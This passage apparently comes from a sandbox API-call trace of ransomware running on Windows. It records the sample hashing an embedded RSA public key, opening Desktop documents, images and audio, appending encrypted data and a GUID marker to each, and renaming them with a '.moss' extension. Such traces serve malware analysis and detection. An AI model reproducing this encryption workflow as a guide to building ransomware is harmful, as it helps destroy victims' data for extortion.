returned 1 [0169.139] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.139] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.139] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.139] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.141] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.141] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.141] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.141] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.141] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.141] GetLastError () returned 0x0 [0169.141] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.141] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.141] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.141] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.141] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.141] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.142] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b449a8 [0169.142] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b4aee8 [0169.142] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x26b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.142] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.142] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.142] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.143] CloseHandle (hObject=0x664) returned 1 [0169.144] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.144] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.144] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EQ9uGJ_2p6GN4_4.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eq9ugj_2p6gn4_4.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EQ9uGJ_2p6GN4_4.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eq9ugj_2p6gn4_4.bmp.moss")) returned 1 [0169.147] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bc21130, ftCreationTime.dwHighDateTime=0x1d5de53, ftLastAccessTime.dwLowDateTime=0xe55881f0, ftLastAccessTime.dwHighDateTime=0x1d5de3a, ftLastWriteTime.dwLowDateTime=0xe55881f0, ftLastWriteTime.dwHighDateTime=0x1d5de3a, nFileSizeHigh=0x0, nFileSizeLow=0xa4e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXFGptd.ppt", cAlternateFileName="")) returned 1 [0169.147] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.147] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.147] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EXFGptd.ppt") returned=".ppt" [0169.147] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EXFGptd.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exfgptd.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.147] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=42217) returned 1 [0169.147] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.151] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa4c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.151] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.153] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.153] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xa4e9, lpOverlapped=0x0) returned 1 [0169.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.153] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.154] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.155] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.155] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.155] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.155] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.155] GetLastError () returned 0x0 [0169.156] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.156] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.156] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.156] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.156] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.156] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b449a8 [0169.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b52d18 [0169.157] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa4e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.157] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.157] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.157] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.157] CloseHandle (hObject=0x664) returned 1 [0169.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0169.170] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EXFGptd.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exfgptd.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EXFGptd.ppt.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exfgptd.ppt.moss")) returned 1 [0169.172] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27189920, ftCreationTime.dwHighDateTime=0x1d5e414, ftLastAccessTime.dwLowDateTime=0x5dd94890, ftLastAccessTime.dwHighDateTime=0x1d5e718, ftLastWriteTime.dwLowDateTime=0x5dd94890, ftLastWriteTime.dwHighDateTime=0x1d5e718, nFileSizeHigh=0x0, nFileSizeLow=0x25de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f4Fk.jpg", cAlternateFileName="")) returned 1 [0169.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.172] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f4Fk.jpg") returned=".jpg" [0169.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f4Fk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f4fk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.173] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=9694) returned 1 [0169.173] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.177] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x25b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.177] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.178] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.178] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x25de, lpOverlapped=0x0) returned 1 [0169.178] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.179] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.179] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.179] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.179] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.180] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.180] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.180] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.180] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.180] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.180] GetLastError () returned 0x0 [0169.181] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.181] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.181] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.181] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.181] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.181] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.181] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b449a8 [0169.181] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b4ae08 [0169.181] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x25de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.181] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.182] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.182] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.182] CloseHandle (hObject=0x664) returned 1 [0169.183] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.183] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0169.183] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f4Fk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f4fk.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f4Fk.jpg.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f4fk.jpg.moss")) returned 1 [0169.186] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x161313d0, ftCreationTime.dwHighDateTime=0x1d5d9d8, ftLastAccessTime.dwLowDateTime=0x482990f0, ftLastAccessTime.dwHighDateTime=0x1d5dfa1, ftLastWriteTime.dwLowDateTime=0x482990f0, ftLastWriteTime.dwHighDateTime=0x1d5dfa1, nFileSizeHigh=0x0, nFileSizeLow=0x9681, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="grGgx5k9.mp3", cAlternateFileName="")) returned 1 [0169.186] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.186] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.186] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\grGgx5k9.mp3") returned=".mp3" [0169.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\grGgx5k9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\grggx5k9.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.186] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=38529) returned 1 [0169.186] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.190] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x965b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.190] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.192] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x9681, lpOverlapped=0x0) returned 1 [0169.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.193] lstrlenA (lpString="-----BEGIN PUBLIC 